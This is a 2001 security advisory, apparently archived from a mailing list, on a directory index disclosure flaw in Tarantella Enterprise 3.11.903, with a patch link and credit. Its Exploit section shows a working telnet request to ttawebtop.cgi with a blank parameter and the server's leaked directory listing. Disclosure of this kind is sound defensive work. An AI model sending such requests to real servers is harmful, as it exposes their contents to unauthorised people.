ISSTW Security Advisory (ISSTW200201)
Tarantella Enterprise 3.11.903 Directory Index Disclosure Vulnerability

Discovery Date: Fri, 21 Dec 2001
----------------------------------------------------------------------

Overview:
---------
ISSTW Tiger-Force discovered a vulnerability in Tarantella Enterprise 3
that will reveal directory content with the use of blank parameter.

Problem Description:
--------------------
Tarantella Enterprise 3 is a non-intrusive application/data centralization
solution. End users can access enterprise resources via the web interface.
The vulnerability will allow a malicious user to review the directory content.

Exploit:
--------
shell$ telnet tarantella.somewhere.com 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 21 Dec 2001 11:34:39 GMT
Server: Apache/1.3.4 (Unix)
Content-length: 512
Connection: close
Content-Type: text/html

  ?C . ¨º .. 4 cgi-bin ?E direct.html
   on examples ?
help ?Y
index.html ?Z index2.html ?[
kiosk.html ?\ kiosk2.html ?] loader.html %
  mac -v resources
native 5 java ?w index2.html.orig
›o modules Îb tsp les
x resources.3_11.tar ,w
resources.old

Tested Platform:
---------------
Tarantella Enterprise 3.11.903

Tested OS:
----------
Solaris 7 (Sparc)

Patch Information:
------------------
http://www.tarantella.com/security/bulletin-03.html

Credit:
-------
This vulnerability was discovered and researched by
Chieh-Chun Lin (ccliniss.com.tw)

Disclaimer:

All information in these advisories are subject to change without
any advanced notices neither mutual consensus, and each of them
is released as it is. ISSTW. is not responsible for any risks of
occurrences caused by applying those information.

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]